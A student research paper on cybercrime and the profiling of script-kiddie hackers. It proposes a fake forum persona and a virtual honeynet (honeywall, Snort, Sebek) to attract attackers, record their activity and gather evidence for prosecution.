Research Paper By: Hasantha Alahakoon | 1: Overview of Cyber crimes 1
Computer Hacker Profiling
Despite being a relatively new domain, Internet has become a requisite of the contemporary society. A
country‟s political, social and individual performances are even more dependent on the internet than
ever before. In the twentieth century, the internet, or the cyberspace, is playing a vital role in most, if
not all, of the key aspects of the society such as communication, transport, education, entertainment
and warfare. But with this rapid growth of the internet, going by the popular belief „with every new
technology leads the way to new kinds of crimes‟(Agar 2003), an emergence of new breed of crimes
so called Cyber crimes and a new breed of criminals so called Cyber-criminals was inevitable.
However, because of the increased dependency between the internet and the critical services of the
contemporary society, these cyber-crimes pose a very real and a probable threat. According to a
research conducted by the McAfee Inc, a world‟s prominent computer security company, Businesses
have lost more than one trillion of American Dollars only in year 2008 due to Data theft and Cyber
crimes which depicts how devastating they actually are (Research Shows Global Recession Increasing
Risks to Intellectual Property 2009). Therefore suitable measures to detect and prevent cyber
criminals in advance is of utmost important, and this paper would propose a method of identifying
cyber criminals, hackers to be exact, based on their behavioural aspects with the help of honeynets.
This paper is organised as follows: In section 1, paper would provide an overview of current Cyber
crimes on a very brief height in order to keep the size of the paper in a manageable level. In section 2,
the paper would critically discuss the concept of computer hacking and different types of computer
hackers. Section 3 would discuss hacker profiling, a unique signature that can be used to identify
computer hackers. Section 4 would provide a detailed discussion of step-by-step procedures of setting
up a honeypot, how it functions, how the activities can be monitored, how evidence can be gathered
and how the criminal can be traced back. Finally the paper would draw the conclusions and provide
the grounds for future work.
1: Overview of Cyber crimes Cyber crimes, a domain which has a long lasting history that runs as early as to 1970s, yet an
overlooked concept until early eighties, come in different shapes and flavours. Those are DDOS
attacks, Web Defacement, Identity Theft, Distribution of child pornography, Software Piracy and
Computer Hacking, just to name a few. The following paragraphs would provide very brief
introductions on them.
DDOS is an attack conducted by a cyber criminal using several hundred random computers on the
internet to collectively attack a victim computer infrastructure with a continuous workload up to the
point that it can no longer process its legitimate tasks, thus bringing it offline (Janczewski & Colarik
2005, p.86).
Web Defacement on the other hand, is a cyber criminal accessing and changing the contents of a
popular web server without the consent of the server administrator for the purpose of humiliating the
owners, to gain recognition among the underground community or to convey the hacker‟s opposition
to the contents of the web page (Janczewski & Colarik 2005, p.99).
Child pornography, though a crime that is known to the world before the advent of the internet, has
been reinforced by the cyber space because it acts as a breeding ground for paedophiles to engage
Research Paper By: Hasantha Alahakoon | 2
with and meet children in a virtual world, not to mention it has make it easier for sex offenders to
produce illicit material, meet with offenders with similar interests and to exchange those illicit
materials (Hazelwood & Burgess 2009).
Identity theft/Identity Forge on the other hand, is „the misappropriation of the identity (such as the
name, date of birth, current address or previous addresses) of another person, without their knowledge
or consent‟ (CIFAS) and using those details for criminal activities and for purchasing goods and
services (Janczewski & Colarik 2005, p.120).
Software piracy is unauthorized use or illegal coping of computer software. According to the
Business Software Alliance, as of 2008, the amount of pirated software used in businesses and home
computers accounts for 41 percent causing financial loses of estimated 53 billion American dollars for
software developers (Bartz 2009).
Research Paper By: Hasantha Alahakoon | 2: Review of Computer Hacking 3
2: Review of Computer Hacking Computer hacking or hackers, the focus of this paper, unlike the other disciplines mentioned above,
is hard to define. Just like the term „hacker‟, the „computer hacking‟ too does not have a clear and
concise definition. The term „hacker‟ which referred to a programmer who has extreme competence in
programming skills as a sign of respect in 1970‟s, is now referring to a young programmer who uses
his technical skills to harmful ends such as creating viruses, breaking into other‟s computers and
crashing machines (Chiesa et al. 2007).
Similarly, in early 1960‟s „Computer Hacking‟ is defined as „to put together software programs with
little regard for “official” methods or software writing procedures in order to improve speed and
efficiency‟ (Chiesa et al. 2007). But today, the Cambridge Advanced Dictionary interprets computer
hacking as „to get into someone else‟s computer system without permission in order to find out
information or to do something illegal ‟. So in today‟s world hacking can be loosely defined as
unauthorised access to computer systems. But it is hard to draw a fine line between Computer hacking
and the other computer misuses such as DDOS, Web Defacement, Unauthorised modification etc…
Hacking is not an end, but a means. For instance, in order to perform a DDOS attack, the attacker has
to recruit the zombie machines by hacking into computers and by installing malicious (such as IRC
bots) software on them. Similarly, in order to deface a web page, the attacker has to gain access to that
web server by hacking in to it.
So it is clear that, hacking is merely a means of performing another crime. Once hacked, the attacker
can perform any crime he desires ranging from DDOS, Web Defacement, and Identity theft to credit
card fraud.
“To some, it is about exploration, learning, and fascination with the inner workings of the technology
that surrounds us; to others, it is more about playing childish pranks, such as rearranging someone‟s
Web page or displaying pornographic images on a public server.” (Thomas 2002)
2.1: Computer Hackers In early 1960‟s the term „Hacker‟ was used by the programmers to describe a fellow programmer who
is really competent in programming and who has the ability to change or modify existing codes in a
way that would result the software to run more efficiently than the „official‟ version. But by the time
of late 1970‟s, it was not sufficient for a programmer to write efficient code in order to be called as a
„hacker‟, but it was also necessary for him to belong to a hacker culture or to the hacker
„underground‟. But today, a „hacker‟ is a programmer who merely uses his skills or the tools he
possess for destructives ends such as network crashing, virus creating and illegal computer access.
The term „hacker‟ which was an honourable term once, is now used to describe the programmers once
so called „crackers‟. (Chiesa et al. 2007)
Definitions aside, hackers see themselves as a set of people who are motivated by inquisitiveness,
willing to take challengers, smarter than others and continuously in search of information. In addition
they are strong believers of freedom of information. They believe that the information should be
equally available for everyone and things should be allowed to be improved. One‟s reputations or the
rank in the hacker underground is dependent on his skills on programming and on various operating
systems, his abilities and knowledge on hacking, and on his willingness to share his knowledge with
the others. Though hacking in to computer systems without the consent is considered illegal,
according to hacker code of ethics, it is acceptable as long as the hacker is not stealing, destroying or
breaching the confidentiality of the owner (Thomas 2002).
Research Paper By: Hasantha Alahakoon | 4
However, not all of the hackers adhere to the „hacker code of ethics‟ equally. Therefore the hacker
community can be categorised into two main section, „white-hat hackers‟ and „black-hat hackers‟. As
the names imply, those represent the two extreme ends of the hacking community, the good and the
evil. White-hat hackers are the „good‟ hackers who possess the skills of a black hat but have decided
to stay with authorities and governments to help with anti-cyber crime operations. Black-hats, on the
other hand, are the criminal hackers who access the others‟ computer systems illegally and steal and
sell information reside on them. Between those two extremes, reside the „grey-hat‟ hackers who do
not seem to have a clear code of ethics.
The hackers can be further categorised based on their level of expertise in the field of hacking. The
main ones are, among others, „Wannabe lamer‟, „Script-kiddie‟, „Cracker‟, „Ethical hacker‟,‟ Cyber-
warrior‟ and „Industrial spies‟. (Chiesa et al. 2007)
Wannabe lamer, the most common type of hackers, are the „newbie‟ of field of computer hacking.
They are new to hacking and lack the expertise needed. Script-kiddie, the next instalment of the
hacker community, is a bit more advanced hacker who is specialised in using hacking tools that are
developed by others.
„Cracker‟, though initially was used to describe software pirates, now refers to dangerous hackers who
are technically competent but are violent in their nature. „Ethical hacker‟ on the other hand, is a
hacker who has a widespread knowledge on several operating systems and a one who uses his
knowledge in a harmless way. They might hack into a system, but they would not spread chaos as the
crackers; they might even inform system administrators after the hacking, about the security fixes
instead. (Chiesa et al. 2007)
„Cyber warriors‟ and the „industrial spies‟ are the professional hackers who have developed various
skills over the years. Unlike the less competent hackers such as Script-kiddies and lamers, they like to
maintain a low profile. „Industrial spies‟ can be disgruntled or ex-employees and therefore they pose a
larger security threat as they are aware of the computer systems used.
Research Paper By: Hasantha Alahakoon | 3: Profiling Computer Hackers 5
3: Profiling Computer Hackers With an understanding of different types of hackers, this section would focus on creating a profile that
would represent a hacker, so that it can be used to attract the other hackers to a honeypot for
subsequent studies. As already pointed out in the previous section, there are different types of hackers.
Those different types of hackers have different types of personalities, motives, knowledge, resources
and technical skills. Therefore, the author believes that, it is not possible to create a single profile that
would cater the needs of all of the above hacker types. Therefore the paper would be more focused on
creating a profile that would appear as a „Script-kiddie‟ which would help attracting the other script-
kiddies to the honeypot. Though the profile might work on the other types of hackers, it will not be
just as effective as it is on the Script-kiddies.
There are several reasons why the paper selected a Script-kiddie as its target. First and foremost, they
are the most common type of hackers next to the „wannabe lamer‟. Though „wannabe lamer‟ is the
most common type, because of their lower skill level, they are not much of a threat to the current
computer systems. In addition, most of the Script-kiddies can also be labelled as „crackers‟ since they
are often destructive. Because of their high numbers and because of their destructive nature, the paper
believes that it is vital to understand them before the other hacker types.
Furthermore, as would be discussed later in the „profile of a Script-kiddie‟ section, script-kiddies do
not have a clear target. They scan the internet for specific vulnerabilities and attack those servers
whereas the big fishes have a clear and a predefined target. Therefore it is next to impossible to easily
attract‟ true‟ hackers into a honeypot using just a profile (Even if a real black-hat is caught he would
most likely identify that he is in a honeypot and would abort), as oppose to script-kiddies who would
most willingly attack (unaware that it is a honeypot) the honeypot if they think they can bring it down
with their tools. Therefore the paper decided to profile script-kiddies to better understand their
behaviours and their tools of the trade.
3.1: Cyber profiling Cyber-crime profiling can be defined as „the investigation, analysis, assessment and reconstruction of
data from a behavioural or psychological perspective extracted from computer systems, networks and
the humans committing the crimes‟ (Tofoyo 2003). Understanding the cyber-criminals better would
undoubtedly help the organisations to safeguard their networks. Criminal profiling can be done in one
of the two ways, deductive profiling and inductive profiling. In deductive profiling, the criminal‟s
personality is deduced by observing the crime scene. In Inductive profiling, the personality of the
criminal is deduced by comparing him with a set of known offenders (Chiesa et al. 2007). In
traditional criminal profiling, the investigators would observe the crime scene behaviour of the
criminal and deduce the information about him. But this paper would be using a reverse approach to
traditional criminal profiling; it would use the inductive profiling. Here, the characteristics of the
criminal (script-kiddie) will be identified by observing known offenders and then a potential crime
scene (a honeypot) of his interest will be developed with the intention of attracting him for further
observations.
In this paper, the deductive method of criminal profiling will be used to create the profile of the
Script-kiddie. The characteristics of the hacker, script-kiddies to be exact, will be identified by
reviewing the available literature on hackers. Those identified characteristics will be used and be
portrayed in the profile that will be created.
Research Paper By: Hasantha Alahakoon | 3: Profiling Computer Hackers 6
3.2: Profile of a Hacker (Script-kiddie) Script-kiddie is a bit advanced hacker than the „wannabe lamer‟ and is specialised in using hacking
tools that are developed by others. While the „real‟ hackers would develop their own tools (in addition
to the available tools) according to the network they are intending to attack, script kiddies always have
to rely on tools developed by others because they possess very little technical skills. They do not have
an idea of the functionality of those tools or how the exploit works, but they do specialise in using
them. Script-kiddies regularly update their arsenal of tools by visiting sites which provides such tools
(Chiesa et al. 2007).
„Real‟ hackers penetrate into computer systems because of their love to the technology and because
they are inquisitive by their very nature. Contrarily, script kiddies do not have any interest to learn or
to gain new competences. They do not care about the means; they are only interested in the end result
(Chiesa et al. 2007).
Script-kiddies are mainly consisted of teenagers who are between the ages 10-18. Script kiddies can
function alone or as a group, but they mostly prefer to act alone. The best way to identify a script-
kiddie is that they love to brag about their activities (the activities they have done using the others
tools) in public. They are mostly driven by the fame; they have a strong ego and have a higher need to
show-off than the other hackers. Script kiddies often use IRC chat rooms to brag about their success
and their exploits whereas the „real‟ hackers are confident about their abilities, do not seek outside
recognition, do not try to satisfy their ego and like to keep a low profile (Chiesa et al. 2007).
For „real‟ hackers, „hacking‟ means being good at computer and operating systems. While a script
kiddie‟s biggest motive is fame, they might also use hacking to show their anger, to make fun of
others or to vent their frustration and aggressiveness. They might find a great satisfaction by hacking
into systems that are considered secure and invulnerable, and this would give them a sense of
ownership and a thrill of forbidden. The idea of getting caught by the police does not discourage
them, but they are excited about it instead. If caught, they think they will be celebrities in their little
hacker underground . (Chiesa et al. 2007)
On the other hand, most of the script-kiddies have never seriously considered the possibility of getting
arrested. They are overly confident about their „hacking skills‟; they believe that they have taken
necessary precautions and have wiped out all the traces. They are even ready to go the extra mile by
openly challenging authorities clamming that they have never been arrested (Chiesa et al. 2007).
The most popular activities among script kiddies are web defacement, DOS, getting control of IRC
chat rooms, kicking their rivals from the chat room and crashing the chat rooms. When it comes to
penetrating computer systems, the „real‟ hackers are well organised and they do not leave anything to
chance. They have a clear target, they use sophisticated tools and tricks, they take notes in every
important step, they follow a specific mode of operation (they have a specific attack signature) and
they would even practice social engineering if necessary. But script kiddies are not so well organised.
Their modus operandi is totally different from the „real‟ hackers. First and foremost, they do not have
a specific target. They just scan the internet for random web servers with known vulnerabilities for
which they have scripts to exploit with. Once such a web sever is found, with the help of those scripts,
they gain root access, do some browsing, copy the contents if interested and would deface the web
page and leave his signature. One significant characteristic of the script kiddies, at least of the
majority of them, is that they do not destroy the contents of the webpage; they copy it into a different
location and notify the system administrators about it (Chiesa et al. 2007).
Research Paper By: Hasantha Alahakoon | 3: Profiling Computer Hackers 7
When defacing, script kiddies prefer to select popular sites and greatly visible sites such government
web sites and large cooperation systems. Further, Script-kiddies can be categorised as „crackers‟ since
they prefer to crash or to DDOS sites with high visibility, as oppose to „real‟ hacker who rarely crash
computer systems deliberately.
3.3: Development of the Physical Profile In order to attract the script-kiddies to the honeypot, it is necessary to visit the underground forums
and IRC chat-rooms they reside and post numerous comments. Before start posting in forums, it is
almost always necessary to register and create a profile with them. When registering with a forum, the
user is asked to provide a nickname, password, email address, age, profile picture, gender and
signature. The following section would provide a brief discussion on the potential information a
script-kiddie would provide when registering with such a forum.
According to Chiesa et al. the nickname of a script-kiddie or a hacker can be anything and it does not
portray any characteristic of him. But Raoul et al. also state that hackers pick nicknames that they
think is „cool‟, or describes their technical skills or often nicknames of elite hackers. And also they
pick nicknames from famous movie (some of the famous movies among hackers are „Wargames‟,
„Lord of the rings‟, „Ferris Bueller‟s Day Off‟ and „The Matrix‟) characters (Chiesa et al. 2007).
Therefore when creating the profile it is possible to pick a nickname such a „m4tr!x_n3o‟ (the
character from a movie) or „Pr0metheus‟ (the nickname of a elite hacker). Script-kiddies or hackers in
general, prefer to use hacker slang when picking a name or when posting on the forums.
As already mentioned, script kiddies are often teenagers between the ages 10-18. Therefore when
creating the profile, it is suitable to pick an age within that range, preferably close to the upper-end.
Choosing a lower age would sometimes reduce the respect among the other script-kiddies, therefore
reducing the chances of attracting the other hackers.
According to a survey conducted by Chiesa et al, most of the hackers are boys. According to his
statistics of the survey 60% of the hackers are male. Therefore as the gender it is suitable to select
„male‟ in order to better mimic a real script-kiddie.
As there is no literature describing a hacker‟s profile picture, a picture of the main actor of the
„Matrix‟ movie will be used to complement the nickname -„m4tr!x_n3o‟ .
The forums often ask for a signature which would be displayed below each of the comments of the
user. Since script-kiddies are often high on their ego, aggressive and overestimates their hacking
skills, in order to appear as a real script-kiddie it is necessary to use a signature such as „hax0r. Real
life is just a hobby‟ or „I 0wn u n00bs!.
Figure 1: An Example profile created at http://www.hackforums.net
Research Paper By: Hasantha Alahakoon | 3: Profiling Computer Hackers 8
After creating the script-kiddie‟s profile, the next and the most important step is to start posting in the
forums. These posts have to be in the hacker slang and carefully planned targeting the interests of the
scrip-kiddies so that they would be lured into the honeypot.
Chiesa et al. in their book „Profiling hackers‟ provide an example of a posting of a hacker. The post is
as follows:
‘Yo man! Whaz da b3st way t0 hack www.nasa.gov???? Hey c’mon, explain me man!!!’
Therefore when posting comments this kind of style and slang would be used to better fit into the
hacker culture. For the purpose of attracting script-kiddies to the honeypot, following comment can be
posted on various hacker forums.
‘yo n00bs, I f0und di$ n3tw0rk (172.168.0.50) last night while I was d0ing $um pr0bing. L00ks like it
is $ome kind 0f a mu$ic service and its Fu11 of $ecurity bugs!! I am g0nna download as much as
mus!c I like 2day, u know what I mean :P’
Figure 2: An example thread started at http://www.hackforums.net
The comment conveys several messages (at least in the best-case scenario) to a script-kiddie, which
would hopefully exploit their weaknesses. First and foremost, the poster is bragging about his
abilities, which is a typical behaviour of a script-kiddie. This bragging and insulting („noob‟ is
considered as an insult in hacking community) would trigger a competition among the fellow
aggressive script-kiddies to take control of the server to prove that they are better than the poster.
Secondly, the poster says that the server is full of security bugs and was found while the poster was
probing. Since the most common method of script-kiddies to find vulnerable servers is by probe
scanning, the other script-kiddies too would expect to find this server by probing. Since the poster
also comments that the server is full of bugs, the script-kiddies would be further encouraged to either
access it illegally, to DDOS it or to deface it (a typical script-kiddie‟s favourite crimes). Since the
most script-kiddies are between the age group of 10-18, it was assumed that they would like to
download audio tracks. Therefore as a bait, the poster mentions about a music service hosted by those
network. Another important characteristic of this comment is that it can not be considered as
entrapment. The poster is not inviting the fellow hackers to the honeypot; at least not directly.
These kind of comments posted on various hacker forums would help to attract script-kiddies to the
honeypot.
Research Paper By: Hasantha Alahakoon | 4: A Honeypot for capturing Script-kiddies 9
4: A Honeypot for capturing Script-kiddies A honey pot is defined by L. Spitzner as an „information system resource whose value lies in
unauthorized or illicit use of that resource‟. Using a honeypot it is possible to better understand the
hackers in terms of their technical aspects such as the their root-kits, tools, Trojans and exploits, and
their ethnological aspects such as their motives, interests and hidden links between different black-hat
groups. Therefore this section of the paper would discuss utilising honeypots in order to better
understand script-kiddies.
4.1: Design of the honeypot For the purpose of observing script-kiddie behaviour, the paper would utilise a 3
rd generation
honeynet; the „Roo‟ Honeywall CDROM provided by the „Honeynet Project‟. The author believes
that it is better to use a well established honeynet framework for this purpose rather than building one
from the scratch. This is because the honeynet framework proposed by the „Honeynet project‟ is
thoroughly tested and evaluated, and on the other hand, there is no need to reinvent the wheel.
A honeynet is a network of honeypots. In other words, it is a high interaction honeypot. It allows the
hackers to interact with real operating systems, real software and real services as oppose to low
interaction honeypots where the attacker is dealing with an emulated environment. Because of this
real environment provided by the honeynets, it is possible to capture more extensive information on
threats such as how they attack, why they attack, what tools they use and how they communicate, than
with a traditional honeypot. One reason for selecting honeynets for this paper is this ability to collect
in-depth information about the attackers, not to mention the freedom it provides the system
administrator to install wide array of applications, services and hardware as on a real server (Spitzner
2003).
Since building a real honeynet is complex, expensive and hard to maintain, the paper would use a
virtual honeynet to attract script kiddies. In a traditional honeynet, each honeypot would be installed
on separate computers. Not only this approach is expensive and hard to maintain, but also the analysis
of the results are harder because the evidence are scattered throughout the network. Contrary, the
virtual honeynet would only occupy a single computer with virtualisation software installed in it; but
it would appear as a network of computers with different operating systems to a script-kiddie.
Therefore the author believes that it is best to use a virtual honeynet to understand script-kiddies.
But virtual honeynets have downsides in their own merit. First and foremost, if an attacker has the
ability to compromise the virtualisation software, he has the ability to take over the honeynet.
Secondly, it is easier for an attacker to detect a virtual honeynet than a traditional honeynet thus
jeopardising the whole idea of the honeypot (Know Your Enemy: Defining Virtual Honeynets 2003).
But, it was assumed that the target population of the honeynet, the script-kiddies, do not possess such
high level skills.
In order to further ensure that the script-kiddies can not gain control of the entire virtual honeynet, it
will be implemented as a „Hybrid virtual honeynet‟. In this case, similar to a traditional honeynet,
firewalls, intrusion detection systems and activity logging will be done on separate devices. Only the
honeypots will be virtually on a single computer. Not only this would make it impossible for script-
kiddies to gain control of the entire honeynet by just exploiting the virtualisation software, but also it
would preserve the evidence even in case of a honeynet takeover.
Research Paper By: Hasantha Alahakoon | 4: A Honeypot for capturing Script-kiddies 10
4.1.1: Precautions to take when designing the Virtual honeynet
The ability to use the honeynet against other computer systems should be minimized. For an
instance, a script-kiddie might try to use the honeynet as a launching pad of DDOS attacks
against other computer systems. Therefore the ability to use the honeypot against the other
computers should be minimised. But it is impossible to neutralise this risk, because in order
to observe hacker behaviour it is necessary to provide him with a considerable degree of
freedom (Know Your Enemy: Honeynets 2006).
The script-kiddie should not be able to detect that he is interacting with a honeynet rather than
with an actual server. If they recognise, the chances are they would abandon the server or try
to bypass the honeynet. Therefore it is crucial to make as little modifications to the honeynet
as possible.
Even if a script-kiddie takeover the honeynet, he should not under any circumstance detect or
modify the collected data. The best way to do this is by storing captured data on a separate
secure computer.
The script-kiddie should never be able to disable the functionality (data control and data
capturing) of the honeynet (Know Your Enemy: Honeynets 2006).
The script-kiddies must not be able to perform illegal activities such as uploading child
pornography, pirated movies, audio and games from the honeynet (Know Your Enemy:
Honeynets 2006).
The script-kiddies must not be entrapped by the honeynet. They should never be forced or
tempted by the honeynet to perform something that they would not do otherwise.
4.1.2: Architecture of the Honeypot
The honeynet system would mainly consist of three components. Those are the honeywall, the virtual
honeynet and the remote management server.
The honeywall will act as the gateway to the honeynet and it will log all the incoming and outgoing
traffic to and from the honeynet. In case of a successful honeynet penetration, the honeywall would
inform the network administrator. In addition to logging all the traffic, the honeywall would also
prevent using the honeynet against the other computer systems.
Fedora core 3 (fully patched with latest security updates), key-logging software and virtualisation
software would be installed on the honeynet computer. Then with the help of the virtualisation
software, different virtual honeypots will be created inside the honeynet computer. Then different
operating systems will be installed on each of the honeypots. These honeypots would appear as a
network of computers to a script-kiddie.
The honey pot operating systems would be left un-patched with security updates so that the script-
kiddies would detect those individual honeypots as potential targets during their vulnerability
scanning. The relevant software and web pages will be installed on the honeypots to make them look
like real web servers, so that the script-kiddies would try to attack them. Since the network level
traffic is already captured and logged by the honeywall, the honeynet only has to capture the activities
that the script-kiddie would perform inside the honeypots such as his keystrokes.
All the data that is collected by the honeywall and the honeynet would be transferred covertly to the
remote management server for storing. The remote management server will be kept separately from
the honeynet and it will be well secured. In addition to storing data collected from the honeynet, the
remote management server can be also used to control the configuration of the honeynet through a
secure connection.
Research Paper By: Hasantha Alahakoon | 4: A Honeypot for capturing Script-kiddies 11
The data collected from the honeynet can be analysed and based on the information derived from
analyses, the script-kiddies can be profiled.
4.2: Functionality of the Honeynet
Figure 3: The Architecture of the Virtual Honeynet
Research Paper By: Hasantha Alahakoon | 4: A Honeypot for capturing Script-kiddies 12
Figure 4: Flowchart for the Honeynet
The most important component of the honeynet is the gateway, often called as the „honeywall‟. It
separates the honeynet from the outside network. It is the single point where all the traffic to the
honeynet is passing through. It is advisable to use a layer two device as the Honeywall in order to
reduce the risk of detection by the script-kiddies (Know Your Enemy: GenII Honeynets 2005).
The honeywall would consist of three Ethernet interfaces. Eth1 is used for the honeynet. Eth0 is used
for the production computers (the production computers are used to profile any internal hackers), and
this interface would stop any attackers accessing the production computers by exploiting the
honeynet. Eth0 and Eth1 would be in the bridging mode in order to reduce the chances of detection.
When in bridging mode, no MAC addresses will be assigned to them, there will be no hops in
between and therefore TTL will not be decremented; thus would effectively reduce the chances of
detection (Know Your Enemy: GenII Honeynets 2005).
As already mentioned above, it is crucial to not to store the collected data on the same computer as the
honeynet as an attacker might destroy or modify them. Therefore eth2 would be used to covertly
transmit collected data into the remote management server. In addition, this interface will be also
used by the remote management server to control the configuration of the honeynet through a secure
shell.
As already mentioned, it is important that the honeynet can not be used as an attacking pad to other
computer system. This is achieved by installing data control software such as IPTables and network
intrusion detection systems on the honeywall. The IPTables will be configured to control the amount
of outbound connection that the honeynet can initiate. When controlling the amount of outbound
Research Paper By: Hasantha Alahakoon | 4: A Honeypot for capturing Script-kiddies 13
connections, it is important to note that limiting it too much would disable the freedom of the script-
kiddie, thus reducing the ability to identify his behaviour properly (It is worth noting that a script-
kiddie would often use outbound connections for ftp, downloading rootkits and for connecting to IRC
channels) . Not only this would disable his freedom, but also would increase the chances of detection
as a skilful hacker might purposely increase the outbound connections to see if he is inside a honeynet
(Know Your Enemy: GenII Honeynets 2005).
The network intrusion detection system on the honeywall is used to drop any packets with known
attacking signatures. The Snort NIPS will be used for this.
4.2.1: Activity Monitoring
In addition to the above functionalities, the most important aspect of any honeypot; the data capturing
and activity monitoring would be done in several layers in the honeynet. Firstly, when IPTables are
used in the honeywall for the purpose of rate limiting the outbound traffic, it also logs all the inbound
and outbound traffic into a separate log file (/var/log/messages) (Know Your Enemy: GenII
Honeynets 2005).
Secondly, a packet sniffer such as Snort which is built into the honeywall would be used to further
monitor each and every packet and its corresponding payload. These two approaches, IPTables and
Snort, would monitor any network level activity (Know Your Enemy: GenII Honeynets 2005).
But script-kiddies activities inside honeynet itself can not be monitored by the honeywall. If the
script-kiddie is using a non-encrypted shell such as telnet to communicate with a honeynet, Snort
would be able to successfully capture them. But most of the time they are using secure encrypted
connections which prove network level packet sniffers inefficient.
Therefore any automated scripts and script-kiddie‟s keystrokes have to be captured inside the
honeynet itself; right after they are decrypted. For that, Sebek, a kernel level data capturing tool,
would be used. Sebek would secretly record any keystrokes and scripts of the attacker, and would
transmit them to the remote management server (Know Your Enemy: GenII Honeynets 2005).
In addition to data storing, as already mentioned under the „Architecture of the honeynet‟, remote
management server can be used to control the honeynet through a remote connection.
4.2.2: Evidence Gathering
All the data that is gathered by the IPTables, Snort and Sebek will be transferred to the Remote
Management server. This is to reduce the chances of detection and to ensure that the script-kiddie will
not be able to modify or to destroy the collected evidence. Since all the collected data from network
level and host level and of different honeypots are in a centralised location, the analyses are made
easier.
When designing the honeynet, in order to attract the script-kiddies, the method of inductive profiling
was used. The honeynet was designed according to the interests, motives and characteristics of the
script-kiddies so that they would be attracted to it. But now it is the time to gauge the success of the
profiling method used; now it is the time to measure the success of attracting the interest. Since now
there is a crime scene and a snapshot of the criminals behaviour, it is possible to see if the captured
behaviour and the crime scene leftovers match with the profile designed earlier.
Research Paper By: Hasantha Alahakoon | 14
After analysing the logs files of IPTables, Snort and Sebek, it is possible to find who hacked into the
honeynet (IP address), when he hacked into it, the tools he used, how he gained access, the timeline of
the events and from where he gained access.
In addition to those details, it is even possible to deduce why he hacked and his characteristics by
observing his behaviour. In other words, it is now possible to build the criminal‟s profile using
deductive profiling. For an instance, if the logs reveal that the hacker has specifically target this
honeypot, it can be assumed that he is mostly like not a script-kiddie. By observing the timeline of the
events, it is also possible get a rough idea about the hacker. As an example, if the attacker is only
present in the early mornings and in late nights, he might be a student or someone who is employed.
In addition, the information the attacker searched for and his actions would also help profiling him.
For an instance, if he searched for a specific object, then he may not be in the honeynet by pure
opportunity. If he was looking for common files such as mp3, movies and credit card numbers,
chances are he ended up in the honeypot randomly and therefore he could be a script-kiddie. If the
attacker performed destructive activities, it can be assumed that he is driven by the anger.
Furthermore, even the way a hacker hesitates, handles the mistakes, and his FTP user name and
password (Most of the time hackers use FTP to download root-kits and other tools) too can reveal
valuable information about him (Romney et al. 2005).
4.2.3: Identity Identification
As the exact information about the attacker such as his IP address and deduced information such as
his potential profile was identified in the „Evidence gathering‟ stage, it is possible to trace back the
attacker. Further information about the black-hat can be received by contacting the ISP related to that
IP address. These information will be then provided to the authorities. The authorities would charge
the attacker based on his activities captured by the honeynet.
4.3: The Laws against the Script-kiddie A script-kiddie can be mainly prosecuted against the „Computer Fraud and Abuse Act‟ in USA and
against the „Computer Misuse Act‟ in UK. The „Computer Fraud and Abuse Act‟ act can be further
broken down into three sub acts. Those are „Unlawful Access to Information act‟, „Unlawful Access
to Obtain Something of Value act‟ and „Unlawful Access Causing Damage act‟ (Wittliff 2003). The
„Computer Misuse Act‟ mentions three computer misuses. Those are „Unauthorised access to a
computer system‟, Unauthorised access with intent to commit or facilitate commission of further
offences‟ and „Unauthorised modification of computer material‟. Based on the script-kiddie‟s
activities inside the honeynet, he can be charged with one or more of those acts.
But however the criminal can present the defence of entrapment against the evidence collected from a
honeynet. In order get the best use of a honeynet, it has to be probed or attacked. Therefore developers
often promote honeynets among the hacker community. So the criminal can argue that he was
tempted by the honeynet to perform something that he would not do otherwise.
Research Paper By: Hasantha Alahakoon | 5: Conclusion 15
5: Conclusion With the rapid development of the internet and the associated technologies, there has also been an
equal, if not more, increase in the cyber crimes. Cyber-criminals are increasing in an alarming rate as
a result of freely available tools and guides on the internet. Everyday new tools and exploits are being
released making it next to impossible for system administrators to familiarise with these exploits and
to stay on par with the hackers.
As a result, the concept of honeypots was developed. The concept of honeypot is quite simple. It is a
resource available for public so that it might attract the cyber-criminals providing them with a virtual
environment that they can interact with. Though not a novel concept, the latest honeypots, the
honeynets, provide some of the most promising features in terms in criminal profiling. Unlike the
earlier honeypots, they are highly interactive, easy to install, easy to maintain and inexpensive. They
work straight out of the box and even come as a complete package in a CD ROM as oppose to earlier
honeypots where the individual components had to be installed and configured separately. The new
honeypots are capable of capturing extensive information about the criminals thus making criminal
profiling easier.
Criminal profiling, on the other hand can be seen as providing criminals with a unique signature based
on their characteristics such as skills, motivations, resources and knowledge. Criminal profiling would
help better understanding the cyber-criminals. Understanding the cyber-criminals and their behaviour
would undoubtedly help the organisations to safeguard their networks.
It is clear that the information gathered from latest honeynets and criminal profiling strategies would
undoubtedly make a hacker‟s life hard. But the current honeynet developers tend to overly focus on a
single aspect of the honeynet. They are continuously focusing on the honeynet itself, and looking for
more sophisticated capturing tools (Raynal et al). But the author believes that the future research on
honeynet has to be more oriented on developing tools that are capable of analysing the captured data
more comprehensively.
Research Paper By: Hasantha Alahakoon | 6. References 16
6. References Agar, J 2003, Constant Touch: A Global History of the Mobile Phone, Icon Books, UK.
Bartz, D 2009, Study finds software piracy growing. Retrieved April 28, 2009 from
http://uk.news.yahoo.com/22/20090512/ttc-study-finds-software-piracy-growing-fe50bdd.html
Chiesa, R, Ducci, S & Ciappi, S 2007, Profiling Hackers, Auerbach Publications, Broken Sound
Parkway.
Douglas, T 2002, Hacker Culture, University of Minnesota Press, Minnesota.
Hazelwood, RR & Burgess, AW 2009, Practical Aspects of Rape Investigation, Taylor & Francis
Group, Broken Sound Parkway.
Janczewski, LJ & Colarik, A 2005, Managerial Guide for Handling Cyber-Terrorism and Information
Warfare, Idea Group Publishing, Hershey.
Know Your Enemy: Defining Virtual Honeynets 2003. Retrieved from May 2, 2009 from
http://old.honeynet.org/papers/virtual/
Know Your Enemy: GenII Honeynets 2005. Retrieved from May 2, 2009 from
http://old.honeynet.org/papers/gen2/
Know Your Enemy: Honeynets 2006. Retrieved from May 2, 2009 from
http://old.honeynet.org/papers/honeynet/
Research Shows Global Recession Increasing Risks to Intellectual Property 2009. Retrieved April 28,
2009 from http://www.mcafee.com/us/about/press/corporate/2009/20090129_063500_j.html
Romney, GW, Jeremiah, JK, Brandon, LR & MacCabe, P 2005, IT Security Education is Enhanced
by Analyzing Honeynet Data, IEEE, USA.
Spitzner, L 2003, Honeypots: Definitions and Value of Honeypots. Retrieved April 28, 2009 from
http://www.tracking-hackers.com/papers/honeypots.html
Wittliff, WR 2003, Computer Hacking and Liability Issues: When Does Liability Attach?. Retrieved
from May 5, 2009 from http://www.gdhm.com/pdf/wrw-hack_article.pdf